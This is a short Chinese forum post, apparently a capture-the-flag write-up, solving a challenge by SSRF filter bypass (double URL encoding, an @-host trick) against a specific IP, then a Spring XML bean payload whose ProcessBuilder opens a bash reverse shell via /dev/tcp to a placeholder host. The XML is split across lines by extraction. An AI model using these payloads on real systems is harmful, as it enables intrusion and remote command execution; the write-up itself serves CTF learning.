-
-
[原创]第一题 至暗时刻
-
发表于:
2020-11-19 10:57
4343
-
需要ssrf127.0.0.1的8088端口 有正则需要带有 .pediy .com/ 测了一会儿发现使用urlencode两次就可以ssrf了
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=http://ip/payload.xml
这样也可以绕ssrf 不过需要服务器写一个302跳转
http://121.36.145.157:8088/getimage?url=http://@@127.0.0.1:1234@m.pediy.com/loadConfig?url=http://127.0.0.1/
ssrf成功后发现需要xml
发现可以用FileSystemXmlApplicationContext 命令执行
https://www.cnblogs.com/afanti/p/10815728.html
使用这里的payload拿shell
拿到shell以后 把home下的jar下载回来
用jd-gui 反编译拿到flag
<?xml version
=
"1.0"
encoding
=
"UTF-8"
?>
<beans xmlns
=
"http://www.springframework.org/schema/beans"
xmlns:xsi
=
"http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation
=
"
http:
/
/
www.springframework.org
/
schema
/
beans http:
/
/
www.springframework.org
/
schema
/
beans
/
spring
-
beans.xsd">
<bean
id
=
"pb"
class
=
"java.lang.ProcessBuilder"
init
-
method
=
"start"
>
<constructor
-
arg >
<
list
>
<value>bash<
/
value>
<value>
-
c<
/
value>
<value><![CDATA[bash >&
/
dev
/
tcp
/
ip
/
2333
0
>&
1
]]
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课